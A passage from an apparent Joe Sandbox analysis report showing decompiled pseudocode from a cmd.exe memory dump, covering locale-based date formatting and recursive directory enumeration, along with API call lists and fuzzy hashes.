                                    				signed int _t173;
                                    				signed int _t181;
                                    				signed int _t185;
                                    				void* _t186;
                                    				void* _t189;
                                    				intOrPtr _t197;
                                    				signed int _t202;
                                    				void* _t206;
                                    				void* _t210;
                                    				void* _t211;
                                    				signed int _t212;
                                    				void* _t213;
                                    
                                    				_t78 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t78 ^ _t212;
                                    				_t157 = _a4;
                                    				_v364 = __edx;
                                    				_v368 = _t157;
                                    				_v360 = 1;
                                    				if(__ecx != 0) {
                                    					_t161 = 9;
                                    					memcpy( &_v420, __ecx, _t161 << 2);
                                    					_t213 = _t213 + 0xc;
                                    					E011F3C49( &_v420,  &_v376);
                                    				} else {
                                    					GetSystemTime( &_v348);
                                    					SystemTimeToFileTime( &_v348,  &_v376);
                                    				}
                                    				FileTimeToLocalFileTime( &_v376,  &_v384);
                                    				FileTimeToSystemTime( &_v384,  &_v348);
                                    				_v352 = 0;
                                    				if( *0x1213cc9 == 0) {
                                    					_t194 = _v348 & 0x0000ffff;
                                    					_t208 = _v346 & 0x0000ffff;
                                    					_t206 = _v342 & 0x0000ffff;
                                    					_v352 = _t194;
                                    					if(_v364 == 0) {
                                    						_t181 = 0x64;
                                    						_t194 = _t194 % _t181;
                                    						_v352 = _t194;
                                    					}
                                    					_t89 =  *0x11fd540; // 0x0
                                    					if(_t89 != 2) {
                                    						if(_t89 == 1) {
                                    							_t110 = _t208;
                                    							_t208 = _t206;
                                    							_t206 = _t110;
                                    						}
                                    					} else {
                                    						_t111 = _t194;
                                    						_t194 = _t206;
                                    						_t206 = _t208;
                                    						_v352 = _t194;
                                    						_t208 = _t111;
                                    					}
                                    					_t164 =  *0x11fd598; // 0x0
                                    					if(_t164 >= 0x20) {
                                    						_t90 =  *0x11fd594; // 0x0
                                    						goto L63;
                                    					} else {
                                    						_t90 = realloc( *0x11fd594, 0x40);
                                    						_pop(0);
                                    						if(_t90 != 0) {
                                    							_t194 = _v352;
                                    							_t164 = 0x20;
                                    							 *0x11fd594 = _t90;
                                    							 *0x11fd598 = _t164;
                                    							L63:
                                    							_push(_t194);
                                    							_push(0x11ff80c);
                                    							_push(_t206);
                                    							_push(0x11ff80c);
                                    							E011E274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
                                    							_t213 = _t213 + 0x20;
                                    							_t206 = 2;
                                    							goto L35;
                                    						}
                                    						_push(_t90);
                                    						goto L50;
                                    					}
                                    				} else {
                                    					_v356 = 0;
                                    					if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
                                    						_t194 = 0x80;
                                    						E011E1040( &_v332, 0x80,  *0x11ff7f8);
                                    					}
                                    					_t118 = _v332;
                                    					_t210 =  &_v332;
                                    					_t206 = 2;
                                    					if(_t118 == 0) {
                                    						L13:
                                    						if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
                                    							L32:
                                    							_t208 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
                                    							if(_t208 == 0) {
                                    								_t128 = GetLastError();
                                    								_push(0);
                                    								L48:
                                    								 *0x1213cf0 = _t128;
                                    								_push(_t128);
                                    								L51:
                                    								E011DC5A2(0);
                                    								_t97 = 0;
                                    								L25:
                                    								return E011E6FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
                                    							}
                                    							_t208 = _t208 + 1;
                                    							_t130 = realloc( *0x11fd594, _t208 + _t208);
                                    							_pop(0);
                                    							if(_t130 == 0) {
                                    								_push(0);
                                    								L50:
                                    								_push(8);
                                    								goto L51;
                                    							}
                                    							 *0x11fd594 = _t130;
                                    							 *0x11fd598 = _t208;
                                    							_t208 = 0;
                                    							if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
                                    								_t128 = GetLastError();
                                    								_push(0);
                                    								goto L48;
                                    							}
                                    							L35:
                                    							_t208 =  *0x11fd594; // 0x0
                                    							L15:
                                    							_push(E011D5AA7(_v344 & 0x0000ffff));
                                    							_t194 = 0x20;
                                    							E011E1040( &_v76, _t194);
                                    							if(_t157 == 0) {
                                    								if(_v360 != 0) {
                                    									if(E011D68B5() == 0) {
                                    										_push(_t208);
                                    										_push( &_v76);
                                    									} else {
                                    										_push( &_v76);
                                    										_push(_t208);
                                    									}
                                    									_t96 = E011E25D9(L"%s %s ");
                                    								} else {
                                    									_push(_t208);
                                    									_t96 = E011E25D9(L"%s ");
                                    								}
                                    								_t157 = _t96;
                                    								L24:
                                    								_t97 = _t157;
                                    								goto L25;
                                    							}
                                    							if(_v360 == 0 || _v364 != 1) {
                                    								E011E1040(_t157, _a8, _t208);
                                    							} else {
                                    								_t101 = E011D68B5();
                                    								_t197 = _a8;
                                    								_t173 = _t157;
                                    								if(_t101 != 0) {
                                    									E011E1040(_t173, _t197, _t208);
                                    									E011E18C0(_t157, _a8, " ");
                                    									_push( &_v76);
                                    								} else {
                                    									E011E1040(_t173, _t197,  &_v76);
                                    									E011E18C0(_t157, _a8, " ");
                                    									_push(_t208);
                                    								}
                                    								E011E18C0(_t157, _a8);
                                    							}
                                    							_t172 = _t157 + 2;
                                    							_t194 = 0;
                                    							do {
                                    								_t100 =  *_t157;
                                    								_t157 = _t206 + _t157;
                                    							} while (_t100 != 0);
                                    							_t157 = _t157 - _t172 >> 1;
                                    							goto L24;
                                    						}
                                    						_t208 =  *0x11fd594; // 0x0
                                    						if(_t208 == 0) {
                                    							goto L32;
                                    						}
                                    						goto L15;
                                    					} else {
                                    						_t159 = _v356;
                                    						_t185 = _t118 & 0x0000ffff;
                                    						_t136 = 0x64;
                                    						do {
                                    							if(_t185 == 0x27) {
                                    								_t210 = _t210 + _t206;
                                    								_t159 = 0 | _t159 == 0x00000000;
                                    								goto L11;
                                    							}
                                    							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
                                    								_t210 = _t210 + _t206;
                                    							} else {
                                    								_t202 = 0;
                                    								do {
                                    									_t210 = _t210 + _t206;
                                    									_t202 = _t202 + 1;
                                    								} while ( *_t210 == _t185);
                                    								_v356 = _t210;
                                    								_t211 = _t210 +  ~_t202 * 2;
                                    								if(_t202 != 1) {
                                    									_t143 = 0x64;
                                    									if(_t185 == _t143) {
                                    										_v360 = 0;
                                    									}
                                    									if(_t202 <= 3) {
                                    										_t210 = _v356;
                                    									} else {
                                    										_t194 = _v356;
                                    										_t186 = _t194;
                                    										_v356 = _t186 + 2;
                                    										do {
                                    											_t145 =  *_t186;
                                    											_t186 = _t186 + _t206;
                                    										} while (_t145 != _v352);
                                    										_t210 = _t211 + 6;
                                    										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
                                    										_t213 = _t213 + 0xc;
                                    									}
                                    									goto L11;
                                    								}
                                    								_t189 = _t211;
                                    								_t194 = _t189 + 2;
                                    								do {
                                    									_t149 =  *_t189;
                                    									_t189 = _t189 + _t206;
                                    								} while (_t149 != _v352);
                                    								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
                                    								_t213 = _t213 + 0xc;
                                    								_t210 = _t211 + 4;
                                    							}
                                    							L11:
                                    							_t139 =  *_t210 & 0x0000ffff;
                                    							_t185 = _t139;
                                    							_t136 = 0x64;
                                    						} while (_t139 != 0);
                                    						_t157 = _v368;
                                    						goto L13;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D5B31
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B45
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D5B59
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B6D
                                    • realloc.MSVCRT ref: 011E9C24
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 011D5BA2
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 011D5C2A
                                    • memmove.MSVCRT ref: 011D5D23
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 011D5D4D
                                    • realloc.MSVCRT ref: 011D5D68
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 011D5D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                    • String ID: %02d%s%02d%s%02d$%s $%s %s
                                    • API String ID: 2927284792-4023967598
                                    • Opcode ID: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction ID: 76cd7a06cad67bd7d68d8fe329aa2d965ab84651da7277fc0e31147f3469e279
                                    • Opcode Fuzzy Hash: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction Fuzzy Hash: 14C1B471A006299BDF2CDB98DC4CAFE77F9EB99708F004169E90AD7244DB319E81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E011D85EA(WCHAR* __ecx, long __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				struct _WIN32_FIND_DATAW _v1140;
                                    				WCHAR* _v1144;
                                    				long _v1148;
                                    				void* _v1152;
                                    				char _v1156;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t104;
                                    				short _t117;
                                    				void* _t121;
                                    				signed int _t122;
                                    				signed int _t124;
                                    				WCHAR* _t126;
                                    				void* _t127;
                                    				void* _t130;
                                    				WCHAR* _t136;
                                    				intOrPtr _t139;
                                    				WCHAR* _t140;
                                    				WCHAR* _t144;
                                    				intOrPtr _t147;
                                    				WCHAR* _t151;
                                    				WCHAR* _t153;
                                    				WCHAR* _t158;
                                    				WCHAR* _t159;
                                    				long _t160;
                                    				long _t162;
                                    				signed int _t164;
                                    				signed int _t165;
                                    				signed int _t166;
                                    				signed int _t167;
                                    				WCHAR* _t168;
                                    				WCHAR* _t169;
                                    				void* _t173;
                                    				void* _t177;
                                    				long _t178;
                                    				void* _t179;
                                    				void* _t180;
                                    				short* _t186;
                                    				signed int _t188;
                                    				long _t192;
                                    				signed int _t193;
                                    				signed int _t194;
                                    				intOrPtr* _t197;
                                    				signed int _t198;
                                    				signed int _t199;
                                    				intOrPtr* _t203;
                                    				signed int _t205;
                                    				WCHAR* _t207;
                                    				char* _t208;
                                    				char* _t209;
                                    				long _t214;
                                    				signed int _t220;
                                    				WCHAR* _t221;
                                    				signed int _t222;
                                    				long _t223;
                                    				signed int _t224;
                                    				void* _t225;
                                    				void* _t226;
                                    				void* _t241;
                                    				void* _t260;
                                    
                                    				_t217 = __edx;
                                    				_t104 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t104 ^ _t224;
                                    				_v24 = 1;
                                    				_t223 = 0;
                                    				_v20 = 0x104;
                                    				_v28 = 0;
                                    				_t220 = __edx;
                                    				_t176 = __ecx;
                                    				_v1148 = __edx;
                                    				_v1144 = __ecx;
                                    				memset( &_v548, 0, 0x104);
                                    				_t226 = _t225 + 0xc;
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					_t223 = 8;
                                    					goto L43;
                                    				} else {
                                    					 *_t220 = 1;
                                    					_t221 = _t176;
                                    					_t186 =  &(_t221[1]);
                                    					do {
                                    						_t117 =  *_t221;
                                    						_t221 =  &(_t221[1]);
                                    					} while (_t117 != 0);
                                    					_t222 = _t221 - _t186;
                                    					_t220 = _t222 >> 1;
                                    					if(_t222 == 0) {
                                    						_t223 = 0xa1;
                                    						L43:
                                    						__imp__??_V@YAXPAX@Z();
                                    						return E011E6FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
                                    					}
                                    					if(_t220 + 3 > 0x7fe7) {
                                    						L42:
                                    						_t223 = E011D8885(_t176);
                                    						goto L43;
                                    					}
                                    					_t121 = FindFirstFileW(_t176,  &_v1140);
                                    					if(_t121 == 0xffffffff) {
                                    						_t122 = 0x10;
                                    						_t188 = 0;
                                    						_v1140.dwFileAttributes = _t122;
                                    						_v1140.dwReserved0 = 0;
                                    					} else {
                                    						FindClose(_t121);
                                    						_t188 = _v1140.dwReserved0;
                                    						_t122 = _v1140.dwFileAttributes;
                                    					}
                                    					if((_t122 & 0x00000010) == 0) {
                                    						goto L42;
                                    					} else {
                                    						if((_t122 & 0x00000400) != 0) {
                                    							__eflags = _t188 & 0x20000000;
                                    							if((_t188 & 0x20000000) != 0) {
                                    								goto L42;
                                    							}
                                    						}
                                    						E011E0D89(_t217, _t176);
                                    						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
                                    						if(_t124 != 0x3a && _t124 != 0x5c) {
                                    							E011E0CF2(_t217, "\\");
                                    							_t220 = _t220 + 1;
                                    						}
                                    						E011E0CF2(_t217, "*");
                                    						_t126 = _v28;
                                    						if(_t126 == 0) {
                                    							_t126 =  &_v548;
                                    						}
                                    						_t127 = FindFirstFileW(_t126,  &_v1140);
                                    						_v1152 = _t127;
                                    						if(_t127 == 0xffffffff) {
                                    							goto L42;
                                    						} else {
                                    							while(1) {
                                    								L14:
                                    								_t241 =  *0x11fd544 - _t223; // 0x0
                                    								if(_t241 != 0) {
                                    									break;
                                    								}
                                    								_t217 =  &(_v1140.cAlternateFileName);
                                    								_t192 = _t217;
                                    								_t177 = _t192 + 2;
                                    								do {
                                    									_t130 =  *_t192;
                                    									_t192 = _t192 + 2;
                                    								} while (_t130 != _t223);
                                    								_t193 = _t192 - _t177;
                                    								_t194 = _t193 >> 1;
                                    								if(_t193 != 0) {
                                    									L21:
                                    									if(_t194 + _t220 >= 0x7fe7) {
                                    										_t176 = _v1144;
                                    										_push(_t217);
                                    										 *_v1148 = _t223;
                                    										E011DC5A2(_t194, 0x400023da, 2, _v1144);
                                    										L41:
                                    										FindClose(_v1152);
                                    										_t260 =  *0x11fd544 - _t223; // 0x0
                                    										if(_t260 != 0) {
                                    											goto L43;
                                    										}
                                    										goto L42;
                                    									}
                                    									_t134 = _v28;
                                    									if(_v28 == 0) {
                                    										_t134 =  &_v548;
                                    									}
                                    									E011E1040(_t134 + _t220 * 2, _v20 - _t220, _t217);
                                    									_t178 = _v1140.dwFileAttributes;
                                    									if((_t178 & 0x00000010) == 0) {
                                    										__eflags = _t178 & 0x00000001;
                                    										if((_t178 & 0x00000001) != 0) {
                                    											_t207 = _v28;
                                    											__eflags = _t207;
                                    											if(_t207 == 0) {
                                    												_t207 =  &_v548;
                                    											}
                                    											_t162 = _t178 & 0xfffffffe;
                                    											__eflags = _t162;
                                    											SetFileAttributesW(_t207, _t162);
                                    										}
                                    										_t196 = _v28;
                                    										__eflags = _v28;
                                    										if(_v28 == 0) {
                                    											_t196 =  &_v548;
                                    										}
                                    										_t217 = _t178;
                                    										_t136 = E011D83F2(_t196, _t178);
                                    										__eflags = _t136;
                                    										if(_t136 == 0) {
                                    											goto L39;
                                    										} else {
                                    											__eflags = _t136 - 0x4d3;
                                    											if(_t136 == 0x4d3) {
                                    												break;
                                    											}
                                    											__eflags = _t136 - 3;
                                    											if(_t136 == 3) {
                                    												_t158 = _v28;
                                    												__eflags = _t158;
                                    												if(_t158 == 0) {
                                    													_t158 =  &_v548;
                                    												}
                                    												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
                                    												_t226 = _t226 + 0xc;
                                    												__eflags = _t158;
                                    												if(_t158 != 0) {
                                    													_t159 = _v28;
                                    													__eflags = _t159;
                                    													if(_t159 == 0) {
                                    														_t159 =  &_v548;
                                    													}
                                    													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
                                    													__eflags = _t160 - 0x7fe7;
                                    													if(_t160 > 0x7fe7) {
                                    														SetLastError(0x6f);
                                    													}
                                    												}
                                    											}
                                    											_t197 =  &(_v1140.cAlternateFileName);
                                    											_t217 = _t197 + 2;
                                    											do {
                                    												_t139 =  *_t197;
                                    												_t197 = _t197 + 2;
                                    												__eflags = _t139 - _t223;
                                    											} while (_t139 != _t223);
                                    											_t140 = _v28;
                                    											_t198 = _t197 - _t217;
                                    											__eflags = _t198;
                                    											_t199 = _t198 >> 1;
                                    											if(_t198 == 0) {
                                    												L86:
                                    												__eflags = _t140;
                                    												if(_t140 == 0) {
                                    													_t140 =  &_v548;
                                    												}
                                    												E011DC5A2(_t199, 0x4000271b, 1, _t140);
                                    												_t226 = _t226 + 0xc;
                                    												L89:
                                    												_push(_t223);
                                    												_push(GetLastError());
                                    												E011DC5A2(_t199);
                                    												_t144 = _v28;
                                    												__eflags = _t144;
                                    												if(_t144 == 0) {
                                    													_t144 =  &_v548;
                                    												}
                                    												SetFileAttributesW(_t144, _t178);
                                    												 *_v1148 = _t223;
                                    												goto L39;
                                    											}
                                    											__eflags = _t140;
                                    											if(_t140 == 0) {
                                    												_t140 =  &_v548;
                                    											}
                                    											__eflags = 0;
                                    											_t140[_t220] = 0;
                                    											_t203 =  &(_v1140.cFileName);
                                    											_t217 = _t203 + 2;
                                    											do {
                                    												_t147 =  *_t203;
                                    												_t203 = _t203 + 2;
                                    												__eflags = _t147 - _t223;
                                    											} while (_t147 != _t223);
                                    											_t205 = _t203 - _t217 >> 1;
                                    											_t199 =  &_v548;
                                    											__eflags = _t205 + _t220 - 0x7fe7;
                                    											if(_t205 + _t220 < 0x7fe7) {
                                    												E011E0CF2(_t217,  &(_v1140.cFileName));
                                    												_t151 = _v28;
                                    												__eflags = _t151;
                                    												if(_t151 == 0) {
                                    													_t151 =  &_v548;
                                    												}
                                    												E011DC5A2(_t199, 0x4000271b, 1, _t151);
                                    												_t153 = _v28;
                                    												_t226 = _t226 + 0xc;
                                    												__eflags = _t153;
                                    												if(_t153 == 0) {
                                    													_t153 =  &_v548;
                                    												}
                                    												_t153[_t220] = 0;
                                    												_t199 =  &_v548;
                                    												E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
                                    												goto L89;
                                    											}
                                    											E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
                                    											_t140 = _v28;
                                    											goto L86;
                                    										}
                                    									} else {
                                    										_t208 = ".";
                                    										_t164 =  &(_v1140.cFileName);
                                    										_t179 = 4;
                                    										while(1) {
                                    											_t217 =  *_t164;
                                    											if(_t217 !=  *_t208) {
                                    												break;
                                    											}
                                    											if(_t217 == 0) {
                                    												L29:
                                    												_t165 = _t223;
                                    												L30:
                                    												if(_t165 == 0) {
                                    													L39:
                                    													if(FindNextFileW(_v1152,  &_v1140) != 0) {
                                    														goto L14;
                                    													}
                                    													goto L40;
                                    												}
                                    												_t209 = L"..";
                                    												_t166 =  &(_v1140.cFileName);
                                    												while(1) {
                                    													_t217 =  *_t166;
                                    													if(_t217 !=  *_t209) {
                                    														break;
                                    													}
                                    													if(_t217 == 0) {
                                    														L36:
                                    														_t167 = _t223;
                                    														L38:
                                    														if(_t167 != 0) {
                                    															_t210 = _v28;
                                    															__eflags = _v28;
                                    															if(_v28 == 0) {
                                    																_t210 =  &_v548;
                                    															}
                                    															_t217 =  &_v1156;
                                    															_t168 = E011D85EA(_t210,  &_v1156);
                                    															__eflags =  *0x11fd544 - _t223; // 0x0
                                    															if(__eflags != 0) {
                                    																goto L40;
                                    															} else {
                                    																__eflags = _t168;
                                    																if(_t168 == 0) {
                                    																	goto L39;
                                    																}
                                    																_t211 = _v1148;
                                    																 *_v1148 = _t223;
                                    																__eflags = _t168 - 0x91;
                                    																if(_t168 != 0x91) {
                                    																	L58:
                                    																	_t169 = _v28;
                                    																	__eflags = _t169;
                                    																	if(_t169 == 0) {
                                    																		_t169 =  &_v548;
                                    																	}
                                    																	E011DC5A2(_t211, 0x4000271b, 1, _t169);
                                    																	_t226 = _t226 + 0xc;
                                    																	_push(_t223);
                                    																	_push(GetLastError());
                                    																	E011DC5A2(_t211);
                                    																	goto L39;
                                    																}
                                    																__eflags = _v1156 - _t223;
                                    																if(_v1156 == _t223) {
                                    																	goto L39;
                                    																}
                                    																goto L58;
                                    															}
                                    														}
                                    														goto L39;
                                    													}
                                    													_t217 =  *((intOrPtr*)(_t166 + 2));
                                    													_t47 =  &(_t209[2]); // 0x2e
                                    													if(_t217 !=  *_t47) {
                                    														break;
                                    													}
                                    													_t166 = _t166 + _t179;
                                    													_t209 =  &(_t209[_t179]);
                                    													if(_t217 != 0) {
                                    														continue;
                                    													}
                                    													goto L36;
                                    												}
                                    												asm("sbb eax, eax");
                                    												_t167 = _t166 | 0x00000001;
                                    												__eflags = _t167;
                                    												goto L38;
                                    											}
                                    											_t217 =  *((intOrPtr*)(_t164 + 2));
                                    											_t44 =  &(_t208[2]); // 0x200000
                                    											if(_t217 !=  *_t44) {
                                    												break;
                                    											}
                                    											_t164 = _t164 + _t179;
                                    											_t208 =  &(_t208[_t179]);
                                    											if(_t217 != 0) {
                                    												continue;
                                    											}
                                    											goto L29;
                                    										}
                                    										asm("sbb eax, eax");
                                    										_t165 = _t164 | 0x00000001;
                                    										goto L30;
                                    									}
                                    								}
                                    								_t217 =  &(_v1140.cFileName);
                                    								_t214 = _t217;
                                    								_t180 = _t214 + 2;
                                    								do {
                                    									_t173 =  *_t214;
                                    									_t214 = _t214 + 2;
                                    								} while (_t173 != _t223);
                                    								_t194 = _t214 - _t180 >> 1;
                                    								goto L21;
                                    							}
                                    							L40:
                                    							_t176 = _v1144;
                                    							goto L41;
                                    						}
                                    					}
                                    				}
                                    			}





































































                                    0x011f0549
                                    0x011f0549
                                    0x011f0550
                                    0x011f0555
                                    0x011f055b
                                    0x011f0560
                                    0x011f05c3
                                    0x011f05c8
                                    0x011f05cb
                                    0x011f05cd
                                    0x011f05cf
                                    0x011f05cf
                                    0x011f05dd
                                    0x011f05e2
                                    0x011f05e5
                                    0x011f05e8
                                    0x011f05ea
                                    0x011f05ec
                                    0x011f05ec
                                    0x011f05f4
                                    0x011f05ff
                                    0x011f0605
                                    0x00000000
                                    0x011f0605
                                    0x011f0569
                                    0x011f056e
                                    0x00000000
                                    0x011f056e
                                    0x011d87a2
                                    0x011d87a4
                                    0x011d87a9
                                    0x011d87af
                                    0x011d87b0
                                    0x011d87b0
                                    0x011d87b6
                                    0x00000000
                                    0x00000000
                                    0x011d87bf
                                    0x011d87d8
                                    0x011d87d8
                                    0x011d87da
                                    0x011d87dc
                                    0x011d881a
                                    0x011d882f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d882f
                                    0x011d87de
                                    0x011d87e3
                                    0x011d87e9
                                    0x011d87e9
                                    0x011d87ef
                                    0x00000000
                                    0x00000000
                                    0x011d87f4
                                    0x011d8809
                                    0x011d8809
                                    0x011d8812
                                    0x011d8814
                                    0x011f0402
                                    0x011f0405
                                    0x011f0407
                                    0x011f0409
                                    0x011f0409
                                    0x011f040f
                                    0x011f0415
                                    0x011f041a
                                    0x011f0420
                                    0x00000000
                                    0x011f0426
                                    0x011f0426
                                    0x011f0428
                                    0x00000000
                                    0x00000000
                                    0x011f042e
                                    0x011f0434
                                    0x011f0436
                                    0x011f043b
                                    0x011f0449
                                    0x011f0449
                                    0x011f044c
                                    0x011f044e
                                    0x011f0450
                                    0x011f0450
                                    0x011f045e
                                    0x011f0463
                                    0x011f0466
                                    0x011f046d
                                    0x011f046e
                                    0x00000000
                                    0x011f0474
                                    0x011f043d
                                    0x011f0443
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0443
                                    0x011f0420
                                    0x00000000
                                    0x011d8814
                                    0x011d87f6
                                    0x011d87fa
                                    0x011d87fe
                                    0x00000000
                                    0x00000000
                                    0x011d8800
                                    0x011d8802
                                    0x011d8807
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d8807
                                    0x011d880d
                                    0x011d880f
                                    0x011d880f
                                    0x00000000
                                    0x011d880f
                                    0x011d87c1
                                    0x011d87c5
                                    0x011d87c9
                                    0x00000000
                                    0x00000000
                                    0x011d87cf
                                    0x011d87d1
                                    0x011d87d6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d87d6
                                    0x011d8876
                                    0x011d8878
                                    0x00000000
                                    0x011d8878
                                    0x011d879c
                                    0x011d8752
                                    0x011d8758
                                    0x011d875a
                                    0x011d875d
                                    0x011d875d
                                    0x011d8760
                                    0x011d8763
                                    0x011d876a
                                    0x00000000
                                    0x011d876a
                                    0x011d8835
                                    0x011d8835
                                    0x00000000
                                    0x011d8835
                                    0x011d8724
                                    0x011d86b5

                                    APIs
                                    • memset.MSVCRT ref: 011D862C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 011D8691
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 011D86A1
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,011D250C,?,?,?,-00000105), ref: 011D8715
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 011D8827
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011D8842
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D885C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstmemset$Next
                                    • String ID: \\?\
                                    • API String ID: 3059144641-4282027825
                                    • Opcode ID: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction ID: 0e3f421af7f84e1e86e2c1c3aec1e6f4d4825a6dbf7035d2294294d4b06031d6
                                    • Opcode Fuzzy Hash: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction Fuzzy Hash: D4D1D571A0011A9BDF2DDB68EC99BBE7779EF18304F4404ADE609D3142EB709A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E011F6FF0(void* __ecx) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v28;
                                    				intOrPtr _v36;
                                    				signed int _v48;
                                    				void _v50;
                                    				void _v52;
                                    				void _v54;
                                    				short _v56;
                                    				char _v124;
                                    				char _v644;
                                    				void* _v648;
                                    				void* _v652;
                                    				signed int _v656;
                                    				signed short* _v660;
                                    				signed short* _v664;
                                    				WCHAR* _v668;
                                    				signed int _v672;
                                    				void* _v676;
                                    				char _v680;
                                    				char _v684;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t111;
                                    				signed int _t112;
                                    				intOrPtr _t119;
                                    				void _t121;
                                    				signed short _t122;
                                    				signed int _t125;
                                    				signed int _t126;
                                    				void _t131;
                                    				void _t136;
                                    				intOrPtr* _t138;
                                    				void _t142;
                                    				signed int _t153;
                                    				signed short* _t163;
                                    				intOrPtr* _t164;
                                    				void* _t167;
                                    				signed short* _t173;
                                    				signed int _t174;
                                    				void* _t184;
                                    				signed int _t187;
                                    				void* _t188;
                                    				signed int _t189;
                                    				signed int _t190;
                                    				void* _t191;
                                    				signed int _t193;
                                    				void* _t196;
                                    				void* _t199;
                                    				signed short* _t200;
                                    				void* _t201;
                                    				intOrPtr* _t202;
                                    				signed int _t204;
                                    				void* _t207;
                                    				void* _t209;
                                    				void* _t210;
                                    				void* _t211;
                                    				signed short* _t213;
                                    				void* _t214;
                                    				signed int _t219;
                                    				signed int _t221;
                                    				intOrPtr _t222;
                                    				signed int _t226;
                                    				intOrPtr _t227;
                                    				intOrPtr _t228;
                                    
                                    				_t153 = _t219;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t221 = (_t219 & 0xfffffff8) + 4;
                                    				_v8 =  *((intOrPtr*)(_t153 + 4));
                                    				_t217 = _t221;
                                    				_push(0xfffffffe);
                                    				_push(0x11fc140);
                                    				_push(E011E7290);
                                    				_push( *[fs:0x0]);
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_push(_t153);
                                    				_t222 = _t221 - 0x288;
                                    				_t111 =  *0x11fd0b4; // 0x2833377e
                                    				_v20 = _v20 ^ _t111;
                                    				_t112 = _t111 ^ _t221;
